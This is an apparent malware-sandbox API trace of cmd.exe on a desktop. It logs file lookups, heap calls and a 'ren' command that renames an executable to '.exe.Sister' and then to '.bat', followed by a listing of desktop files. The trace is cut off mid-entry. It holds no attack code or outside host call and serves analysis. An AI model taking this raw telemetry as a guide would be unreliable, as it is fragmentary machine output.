0x0 [0143.224] GetFullPathNameW (in: lpFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0x7fe7, lpBuffer=0x21ed911ff40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fd660*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0143.224] SetErrorMode (uMode=0x0) returned 0x1 [0143.224] GetProcessHeap () returned 0x21ed8c70000 [0143.224] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5a680 [0143.224] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _String2=".") returned 53 [0143.224] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _String2="..") returned 53 [0143.224] GetFileAttributesW (lpFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe")) returned 0x20 [0143.224] ??_V@YAXPEAX@Z () returned 0x1 [0143.224] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.225] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.225] malloc (_Size=0xffce) returned 0x21ed912ff20 [0143.225] ??_V@YAXPEAX@Z () returned 0x21ed912ff20 [0143.225] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe")) returned 0x20 [0143.225] malloc (_Size=0xffce) returned 0x21ed913ff00 [0143.225] ??_V@YAXPEAX@Z () returned 0x21ed913ff00 [0143.226] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5d000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5d000) returned 0x21ed8d43570 [0143.226] malloc (_Size=0xffce) returned 0x21ed914fee0 [0143.226] ??_V@YAXPEAX@Z () returned 0x21ed914fee0 [0143.227] ??_V@YAXPEAX@Z () returned 0x1 [0143.227] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0143.228] FindNextFileW (in: hFindFile=0x21ed8d43570, lpFindFileData=0x21ed8d5d000 | out: lpFindFileData=0x21ed8d5d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="")) returned 0 [0143.229] GetLastError () returned 0x12 [0143.229] FindClose (in: hFindFile=0x21ed8d43570 | out: hFindFile=0x21ed8d43570) returned 1 [0143.229] ??_V@YAXPEAX@Z () returned 0x1 [0143.229] ??_V@YAXPEAX@Z () returned 0x1 [0143.230] ??_V@YAXPEAX@Z () returned 0x1 [0143.231] ??_V@YAXPEAX@Z () returned 0x1 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.231] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43990 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.231] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95600, Size=0x16) returned 0x21ed8c95840 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.231] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95840) returned 0x16 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.231] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.231] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.231] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d44d40 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.231] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44d40, Size=0xb2) returned 0x21ed8d44d40 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.231] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44d40) returned 0xb2 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.231] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5fdf0 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.231] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fdf0, Size=0x30) returned 0x21ed8d5fdf0 [0143.231] GetProcessHeap () returned 0x21ed8c70000 [0143.232] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5fdf0) returned 0x30 [0143.232] GetProcessHeap () returned 0x21ed8c70000 [0143.232] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5fe30 [0143.232] malloc (_Size=0x1ff9c) returned 0x21ed911ff40 [0143.234] GetProcessHeap () returned 0x21ed8c70000 [0143.234] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d46850 [0143.235] GetProcessHeap () returned 0x21ed8c70000 [0143.235] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d47510 [0143.235] ??_V@YAXPEAX@Z () returned 0x1 [0143.236] malloc (_Size=0x1ff9c) returned 0x21ed911ff40 [0143.239] GetProcessHeap () returned 0x21ed8c70000 [0143.239] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47e10 [0143.239] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed911ff40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0143.240] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d44c00, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d42d90 [0143.240] FindClose (in: hFindFile=0x21ed8d42d90 | out: hFindFile=0x21ed8d42d90) returned 1 [0143.240] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d44c00, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d43750 [0143.240] FindClose (in: hFindFile=0x21ed8d43750 | out: hFindFile=0x21ed8d43750) returned 1 [0143.240] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7ffa939c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7ffa939c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d44c00, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43570 [0143.240] FindClose (in: hFindFile=0x21ed8d43570 | out: hFindFile=0x21ed8d43570) returned 1 [0143.240] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7ffa939c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7ffa939c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d44c00, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0143.240] malloc (_Size=0x1ff9c) returned 0x21ed913fef0 [0143.241] ??_V@YAXPEAX@Z () returned 0x21ed913fef0 [0143.242] GetProcessHeap () returned 0x21ed8c70000 [0143.242] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d44e10 [0143.242] ??_V@YAXPEAX@Z () returned 0x1 [0143.242] ??_V@YAXPEAX@Z () returned 0x1 [0143.244] GetProcessHeap () returned 0x21ed8c70000 [0143.244] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fe30, Size=0x490) returned 0x21ed8d5fe30 [0143.244] GetProcessHeap () returned 0x21ed8c70000 [0143.244] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5fe30) returned 0x490 [0143.244] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0143.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.244] GetFileType (hFile=0x50) returned 0x2 [0143.244] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.244] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0143.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.283] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0143.292] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0143.292] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0143.292] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0143.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.292] GetFileType (hFile=0x50) returned 0x2 [0143.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.292] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0143.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.296] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0143.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.302] GetFileType (hFile=0x50) returned 0x2 [0143.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.302] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0143.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.304] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d5fe00*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d5fe00*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0143.306] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0143.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.306] GetFileType (hFile=0x50) returned 0x2 [0143.306] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.306] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0143.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.309] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0143.317] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0143.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.318] GetFileType (hFile=0x50) returned 0x2 [0143.318] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.318] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0143.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.320] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0143.329] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0143.332] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0143.333] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0143.334] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.335] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.335] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0143.335] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0143.335] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0143.335] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0143.336] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0143.336] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0143.336] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0143.336] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0143.336] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0143.336] ??_V@YAXPEAX@Z () returned 0x1 [0143.336] GetProcessHeap () returned 0x21ed8c70000 [0143.336] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d44e90 [0143.336] GetProcessHeap () returned 0x21ed8c70000 [0143.336] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44e90, Size=0x130) returned 0x21ed8d44e90 [0143.336] GetProcessHeap () returned 0x21ed8c70000 [0143.336] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44e90) returned 0x130 [0143.336] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.336] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.336] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.336] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.336] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed911ff40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.338] ??_V@YAXPEAX@Z () returned 0x1 [0143.338] GetProcessHeap () returned 0x21ed8c70000 [0143.338] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d44fd0 [0143.338] GetProcessHeap () returned 0x21ed8c70000 [0143.338] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d45110 [0143.338] GetProcessHeap () returned 0x21ed8c70000 [0143.338] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45110, Size=0x130) returned 0x21ed8d45110 [0143.338] GetProcessHeap () returned 0x21ed8c70000 [0143.338] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45110) returned 0x130 [0143.339] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.339] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.339] GetProcessHeap () returned 0x21ed8c70000 [0143.339] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43210 [0143.339] GetProcessHeap () returned 0x21ed8c70000 [0143.339] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5cd80 [0143.339] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0143.339] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0143.339] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0x20 [0143.339] GetProcessHeap () returned 0x21ed8c70000 [0143.339] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93111f0 [0143.339] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9311200 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0143.339] SetErrorMode (uMode=0x0) returned 0x0 [0143.339] SetErrorMode (uMode=0x1) returned 0x0 [0143.339] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed911ff40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0143.340] SetErrorMode (uMode=0x0) returned 0x1 [0143.340] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0143.340] GetProcessHeap () returned 0x21ed8c70000 [0143.340] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5ab60 [0143.340] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0143.340] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0143.340] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0x20 [0143.340] ??_V@YAXPEAX@Z () returned 0x1 [0143.341] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.341] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.341] malloc (_Size=0xffce) returned 0x21ed912ff20 [0143.341] ??_V@YAXPEAX@Z () returned 0x21ed912ff20 [0143.341] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0x20 [0143.342] malloc (_Size=0xffce) returned 0x21ed913ff00 [0143.342] ??_V@YAXPEAX@Z () returned 0x21ed913ff00 [0143.342] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5cd90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5cd90) returned 0x21ed8d42f10 [0143.342] malloc (_Size=0xffce) returned 0x21ed914fee0 [0143.343] ??_V@YAXPEAX@Z () returned 0x21ed914fee0 [0143.343] ??_V@YAXPEAX@Z () returned 0x1 [0143.343] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.bat"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0143.344] FindNextFileW (in: hFindFile=0x21ed8d42f10, lpFindFileData=0x21ed8d5cd90 | out: lpFindFileData=0x21ed8d5cd90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", cAlternateFileName="")) returned 0 [0143.346] GetLastError () returned 0x12 [0143.346] FindClose (in: hFindFile=0x21ed8d42f10 | out: hFindFile=0x21ed8d42f10) returned 1 [0143.346] ??_V@YAXPEAX@Z () returned 0x1 [0143.347] ??_V@YAXPEAX@Z () returned 0x1 [0143.347] ??_V@YAXPEAX@Z () returned 0x1 [0143.349] ??_V@YAXPEAX@Z () returned 0x1 [0143.349] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0143.349] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301a1f60, ftCreationTime.dwHighDateTime=0x1d5eb5a, ftLastAccessTime.dwLowDateTime=0xb6aa1d60, ftLastAccessTime.dwHighDateTime=0x1d5ee1a, ftLastWriteTime.dwLowDateTime=0xb6aa1d60, ftLastWriteTime.dwHighDateTime=0x1d5ee1a, nFileSizeHigh=0x0, nFileSizeLow=0x7af5, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="d_S3PO8QIc.gif", cAlternateFileName="")) returned 1 [0143.349] GetProcessHeap () returned 0x21ed8c70000 [0143.349] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d447c0, Size=0x1de) returned 0x21ed8d45250 [0143.349] GetProcessHeap () returned 0x21ed8c70000 [0143.349] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45250) returned 0x1de [0143.349] GetProcessHeap () returned 0x21ed8c70000 [0143.349] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d602d0 [0143.349] GetProcessHeap () returned 0x21ed8c70000 [0143.349] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d602d0, Size=0x30) returned 0x21ed8d602d0 [0143.349] GetProcessHeap () returned 0x21ed8c70000 [0143.349] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d602d0) returned 0x30 [0143.349] GetProcessHeap () returned 0x21ed8c70000 [0143.349] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d60310 [0143.349] malloc (_Size=0x1ff9c) returned 0x21ed911ff40 [0143.353] GetProcessHeap () returned 0x21ed8c70000 [0143.353] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8810 [0143.353] ??_V@YAXPEAX@Z () returned 0x1 [0143.355] GetProcessHeap () returned 0x21ed8c70000 [0143.355] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d60310, Size=0x160) returned 0x21ed8d60310 [0143.355] GetProcessHeap () returned 0x21ed8c70000 [0143.355] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d60310) returned 0x160 [0143.355] GetProcessHeap () returned 0x21ed8c70000 [0143.355] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d60480 [0143.355] GetProcessHeap () returned 0x21ed8c70000 [0143.355] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d60480, Size=0x290) returned 0x21ed8d60480 [0143.355] GetProcessHeap () returned 0x21ed8c70000 [0143.355] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, 